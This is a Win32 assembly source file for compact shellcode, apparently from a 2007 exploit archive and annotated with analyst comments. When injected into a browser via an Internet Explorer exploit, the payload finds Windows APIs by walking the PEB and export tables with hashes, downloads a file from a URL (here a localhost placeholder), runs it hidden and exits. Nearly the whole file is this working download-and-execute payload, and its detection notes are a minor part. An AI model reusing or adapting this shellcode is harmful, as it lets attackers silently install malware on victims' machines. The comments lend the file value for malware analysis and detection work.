;
; relocatable dynamic runtime assembly code example using hash lookup *** for IE exploits only ***
; the URLMON.DLL must already be loaded into the process space for this to work, so do not run on its own!!
;
; to test use /DTEST_CODE in ml command line
;
; URLDownloadToFileA() / WinExec() / ExitProcess() | ExitThread()
;
; 124 bytes
;
; for testing:
;
; ml /c /coff /Cp /DTEST_CODE dexec32.asm
; link /subsystem:windows /section:.text,w dexec32.obj urlmon.lib
;
; wyse101 [at] gmail.com
;
; March 2007
;
; Assembler configuration: IA-32 instruction set, flat memory model, stdcall as
; the default calling convention. This matches the Win32 APIs invoked below:
; the arguments this code pushes are never popped by it, which is consistent
; with stdcall callee cleanup.
.386
.model flat,stdcall
; Rotate amount shared by the assembly-time hash (hashapi macro) and the
; runtime hash loop (hash_api). Both must use the same value, otherwise no
; export name will ever match a stored hash.
ROL_CONSTANT equ 5
; mrol iNum,iBits -- assembly-time rotate-left expression:
;   (iNum shl iBits) or (iNum shr (32-iBits))
; Used only by hashapi. No explicit 32-bit mask is applied, so it assumes the
; assembler evaluates expressions at 32 bits (as 32-bit ML does); a wider
; evaluation would leave stale high bits that feed back through the shr term
; -- confirm if assembling with another tool. hashapi keeps only the low 16 bits.
mrol macro iNum:req,iBits:req
exitm <(iNum shl iBits) or (iNum shr (32-iBits))>
endm
; mror iNum,iBits -- assembly-time rotate-right counterpart of mrol.
; Not referenced anywhere in this file; kept for symmetry only.
mror macro iNum:req,iBits:req
exitm <(iNum shr iBits) or (iNum shl (32-iBits))>
endm
; hashapi <Name> -- emits a 16-bit (dw) hash of an exported API name, computed
; at assembly time with the same algorithm the runtime hash_api loop applies to
; each export-table name:
;   h = 0
;   for each character c:  h = rol32(h + c, ROL_CONSTANT)
;   h = rol32(h, ROL_CONSTANT)      ; mirrors the terminating 0 byte (add 0, rol)
;   emit h and 0ffffh
; Only the low 16 bits are stored and compared (cmp dx,... in load_api), so two
; export names can collide; a collision makes the runtime resolve and call the
; wrong function. Each expansion gets its own LOCAL dwApi symbol.
hashapi macro szApi
local dwApi
dwApi = 0
forc x,szApi ; walk the name one character at a time
dwApi = dwApi + '&x' ; '&x' expands to the character literal
dwApi = mrol(dwApi,ROL_CONSTANT)
endm
dwApi = mrol(dwApi,ROL_CONSTANT) ; extra rotate for the terminating 0 byte
dw (dwApi and 0ffffh) ; store the low 16 bits only
endm
.code
assume fs:nothing ; allow the fs: segment override used for the TEB/PEB read in load_modules
;-----------------------------------------------------------------------
; Entry point. Layout: code first, then (after load_data) the inline strings
; and the list of 16-bit API hashes. No absolute addresses are used; the data
; address is recovered with the call/pop in load_data + setup_parameters.
; Register roles across the main resolver loop:
;   edi = pointer to the next API hash word (also the stosb/stosw target)
;   ebx = DllBase of the module being scanned, later the resolved API address
;   ebp = next module list entry, later AddressOfNameOrdinals
;   ecx = export-name index (counting down); edx = running hash
;-----------------------------------------------------------------------
code_start:
jmp load_data ; skip over the code to the call/pop trampoline
IFDEF TEST_CODE
; Not reachable at runtime (the jmp above falls past it). Presumably present so
; the test build references urlmon.lib and URLMON.DLL is loaded into the
; process, which the resolver below depends on (see the header note).
extern URLDownloadToFileA :proc
call URLDownloadToFileA ; included when assembled with /DTEST_CODE
ENDIF
;-----------------------------------------------------------------------
; setup_parameters -- reached via `call` from load_data, so the return
; address on the stack is @cmd_start. It is popped into edi (this block never
; executes `ret`; it falls through into load_modules).
; Builds the argument lists for all three API calls on the stack, in the order
; they will be consumed (each stdcall callee pops its own arguments), then
; NUL-terminates the two inline strings in place by overwriting their 0ffh
; placeholder bytes with 0.
; Stack on exit (top first):
;   pCaller=0, szURL, szFileName, dwReserved=0, lpfnCB=0   -> URLDownloadToFileA
;   lpCmdLine, uCmdShow=SW_HIDE(0)                          -> WinExec
;   uExitCode=0                                             -> ExitProcess
; The two stosb writes modify the code image itself, which is why the header
; links with /section:.text,w. Analyst note: a payload that must run from a
; writable+executable region is itself a detection signal.
;-----------------------------------------------------------------------
setup_parameters:
pop edi ; edi = address of @cmd_start (the call's return address)
xor eax,eax ; eax = 0
cdq ; edx = 0 (sign-extension of eax)
; ********************************************************************
push eax ; ExitProcess: exit code = 0
; ********************************************************************
push eax ; WinExec: uCmdShow = SW_HIDE (0)
mov dl,(@cmd_end-@cmd_start)-1 ; edx = length of the command string (8-bit immediate -> up to 255 bytes)
push edi ; WinExec: lpCmdLine = @cmd_start (file name to execute)
; ********************************************************************
push eax ; URLDownloadToFileA: lpfnCB callback = 0
push eax ; URLDownloadToFileA: dwReserved, must be zero
push edi ; URLDownloadToFileA: szFileName = @cmd_start (file name to save as)
add edi,edx ; edi = @url_start-1, the 0ffh placeholder after the command
stosb ; overwrite the placeholder with 0; edi now = @url_start
mov dl,(@url_end-@url_start)-1 ; edx = length of the url (8-bit immediate -> up to 255 bytes)
push edi ; URLDownloadToFileA: szURL = @url_start
push eax ; URLDownloadToFileA: pCaller interface = 0
add edi,edx ; edi = @url_end-1, the 0ffh placeholder after the url
stosb ; overwrite it with 0; edi now = @url_end = first API hash word
; *********************************************************************
;-----------------------------------------------------------------------
; load_modules -- start (or restart) a walk of the loaded-module list.
; In:  edi = pointer to the hash word to resolve next.
; Out: ebp = first entry of InMemoryOrderModuleList; edi saved on the stack.
; Analyst note: the fs:[30h] PEB read followed by an export-table walk is a
; classic hallmark of position-independent shellcode and is what detection
; heuristics for this pattern key on.
;-----------------------------------------------------------------------
load_modules:
push edi ; save current offset to hashes (stack: [hash ptr])
push 30h ; push imm8 + pop is shorter than mov ecx,30h
pop ecx
mov eax,fs:[ecx] ; TEB+30h -> PEB base address
mov eax,[eax+0ch] ; PEB.Ldr -> PEB_LDR_DATA
mov ebp,[eax+1ch] ; InMemoryOrderModuleList.Flink (first LIST_ENTRY)
;-----------------------------------------------------------------------
; scan_dll -- take the next module from the list and locate its export
; directory.
; In:  ebp = current InMemoryOrder LIST_ENTRY; stack: [hash ptr]
; Out: ebx = DllBase, ecx = NumberOfNames, edi = AddressOfNames (VA),
;      ebp = AddressOfNameOrdinals (VA); stack: [AddressOfFunctions][next module][hash ptr]
; Note: there is no check that the export-directory RVA is non-zero and no
; check for reaching the list head, so the loop terminates only when some
; module exports a name whose hash matches.
;-----------------------------------------------------------------------
scan_dll:
mov ebx,[ebp+8] ; DllBase (LDR_DATA_TABLE_ENTRY, relative to InMemoryOrderLinks)
mov ebp,[ebp] ; Flink -> next module entry
push ebp ; save next module (stack: [next module][hash ptr])
mov eax,[ebx+3ch] ; IMAGE_DOS_HEADER.e_lfanew
mov eax,[ebx+eax+78h] ; IMAGE_DIRECTORY_ENTRY_EXPORT RVA
lea esi,[ebx+eax+18h] ; offset IMAGE_EXPORT_DIRECTORY.NumberOfNames
lodsd
xchg eax,ecx ; ecx = NumberOfNames (1-byte form of mov ecx,eax)
lodsd
add eax,ebx ; AddressOfFunctions (VA)
push eax ; stack: [AddressOfFunctions][next module][hash ptr]
lodsd
lea edi,[eax+ebx] ; AddressOfNames (VA); edi is reused, hash ptr is on the stack
lodsd
lea ebp,[eax+ebx] ; ebp = AddressOfNameOrdinals (VA)
;-----------------------------------------------------------------------
; load_api -- hash each exported name, from index NumberOfNames-1 down to 0,
; and compare the low 16 bits against the hash word at [esp+8].
; In:  ebx = DllBase, ecx = names remaining, edi = AddressOfNames (VA)
;      stack: [AddressOfFunctions][next module][hash ptr]
; Exits to call_api on a match; otherwise restores the stack and moves to the
; next module via scan_dll.
;-----------------------------------------------------------------------
load_api:
mov esi,[edi+4*ecx-4] ; RVA of name[ecx-1]
add esi,ebx ; esi = pointer to the name string
xor eax,eax ; eax = 0 so lodsb leaves the upper 24 bits clear
cdq ; edx = 0, running hash
; hash_api: edx = rol(edx + byte, ROL_CONSTANT) for every byte, including the
; terminating 0 (which is why hashapi applies one extra rotate).
hash_api:
lodsb ; al = next byte; upper bits of eax are still 0 (see dec below)
add edx,eax
rol edx,ROL_CONSTANT
dec eax ; non-zero byte -> eax in 0..254, SF clear; 0 terminator -> eax = -1, SF set
jns hash_api
mov esi,[esp+8] ; get api hashes (third slot: [AddressOfFunctions][next module][hash ptr])
cmp dx,word ptr[esi] ; compare only the low 16 bits of the hash
je call_api
loop load_api ; ecx--, try the previous name while ecx != 0
pop eax ; discard AddressOfFunctions
pop ebp ; restore next module entry
jmp scan_dll
;-----------------------------------------------------------------------
; call_api -- resolve the matched export to an address and call it with the
; arguments already on the stack (laid out by setup_parameters).
; In:  ebx = DllBase, ecx-1 = matching name index, ebp = AddressOfNameOrdinals
;      stack: [AddressOfFunctions][next module][hash ptr]
; After the call the hash pointer is advanced by 2 and the resolver restarts
; for the next hash. The loop only ends because the last hash is ExitProcess,
; which does not return.
;-----------------------------------------------------------------------
call_api:
pop eax ; eax = AddressOfFunctions (VA)
movzx edx,word ptr [ebp+2*ecx-2] ; ordinal of name[ecx-1]
add ebx,[eax+4*edx] ; ebx = DllBase + function RVA
pop ebp ; drop saved module entry
pop edi ; edi = pointer to the current api hash
call ebx ; call api; stdcall, so the callee pops its own arguments
; stosw advances edi by 2 to the next hash, but it also writes ax (the low word
; of the API's return value) over the hash just consumed. Forensic note: the
; in-memory hash list therefore differs from the on-disk payload after execution.
stosw ; advance 2 bytes to next hash
jmp load_modules ; do another, just keep going until ExitProcess is reached.
; *************************
;-----------------------------------------------------------------------
; load_data -- call/pop trampoline: the `call` pushes the address of @cmd_start
; as its return address, and setup_parameters pops it into edi. Everything that
; follows the call is data, laid out in exactly the order the code expects:
; command string, url string (each ended by a 0ffh placeholder that is turned
; into 0 at runtime), then the 16-bit API hashes consumed in order.
;-----------------------------------------------------------------------
load_data:
call setup_parameters ; never returns; return address doubles as the data pointer
@cmd_start:
db 'file.exe',0ffh ; WinExec("file.exe",SW_HIDE); 0ffh is overwritten with 0 by setup_parameters
@cmd_end:
@url_start:
db 'http://127.0.0.1/file.exe',0ffh ; url of file to download; 0ffh is overwritten with 0
@url_end:
; Hash list: resolved and called one after another by the loop above.
; ExitProcess must stay last -- it is the only thing that stops the loop.
hashapi <URLDownloadToFileA>
hashapi <WinExec>
hashapi <ExitProcess>
; *********************************************************************
end code_start
; milw0rm.com [2007-06-14]